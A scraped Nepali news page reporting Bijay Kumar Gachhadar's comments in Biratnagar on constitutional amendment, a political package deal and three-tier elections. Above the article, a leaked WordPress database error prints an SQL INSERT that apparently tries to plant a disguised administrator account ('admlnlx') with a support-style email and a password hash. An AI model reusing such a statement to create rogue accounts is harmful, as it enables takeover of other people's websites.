WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvlKgxOPt5sP5o1XPkA63EL.0icieK1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 07:33:24', '', 'admlnlx', 'admlnlx')
विराटनगर,माघ १४-
मधेसी जनअधिकार फोरम (लोकतान्त्रिक)का अध्यक्ष विजयकुमार गच्छदारले प्याकेजमा सहमति गर्दै निर्वाचनमा जानुको विकल्प नभएको बताएका छन् ।
विराटनगर एयरपोर्टमा शुक्रबार पत्रकारहरुसँग कुराकानी गर्दै गच्छदारले राजनीतिक गतिरोध अन्त्यका लागि संविधान संशोधन लगायतका विषयमा दलहरुबीच प्याकेजमा नै समाधान खोज्नु पर्ने बताएका हुन् । ‘संविधान कार्यान्वयनका लागि आफ्नो पार्टीले तीन वटै तहको निर्वाचनमा भाग लिने तयारीमा छ’, उनले भने, ‘संविधान कार्यान्वयनका लागि दलहरुबीच सहमति गरेर तीनवटै तहको निर्वाचन गर्नु अपरिहार्य छ ।’ उनले संविधान संशोधनमा दलहरुबीच सहमति नभए निर्वाचनमा जान नसकिने भएकोले पनि प्याकेजमा नै सहमति गरेर अगाडि बढ्नु पर्ने आवश्यक रहेको बताए ।
उनले संविधान संशोधनमा सहमति जुटाउन नसकेको प्रचण्ड नेतृत्वको सरकार अहिलेसम्म असफल रहेको बताए । उनले प्रचण्ड नेतृत्वको सरकारले हालसम्म कुनै ठोस उपलब्धि हासिल गर्न नसकेको तर तीनवटै तहको निर्वाचन गराएर संविधान कार्यान्वयन गराउन सके मात्रै सफल हुने बताए । उनले संविधान कार्यान्वयनमा भइरहेको ढिलाइको मुख्य जिम्मेवार ठूला दल रहेको आरोप लगाए ।